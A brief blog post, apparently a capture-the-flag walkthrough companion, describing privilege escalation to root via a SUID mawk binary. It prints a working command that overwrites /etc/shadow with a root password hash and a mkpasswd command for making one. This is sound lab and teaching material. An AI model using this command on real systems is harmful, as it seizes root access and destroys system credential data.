Let me know if you prefer this format instead of text walkthroughs. This is much easier but you’ll likely have to put up with my incoherent ramblings.

It turned out to be a very easy box. Easy step for user and what turned out to be 2 routes to root. After I stopped recording I played about with the other SUID that was found and managed to get root that way too.

The other way not in the video

Using mawk you can run the following command to overwrite the /etc/shadow/ file then su root. The password is rowbot.

mawk -v LFILE=$LFILE 'BEGIN { print "root:$6$saltsalt$zjiFtiGFBUkyU86/TTUE1Dgg6ZNem6QUdhcVVRsjLXvWGjCm90F/2.PDpGOfGCspP0/j6a6YLlImSqQZIUmqc.:18294:0:99999:7:::" > LFILE }'

To set your own password run this and edit the command above to include the output of the command

mkpasswd -m sha-512 -S saltsalt -s



Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.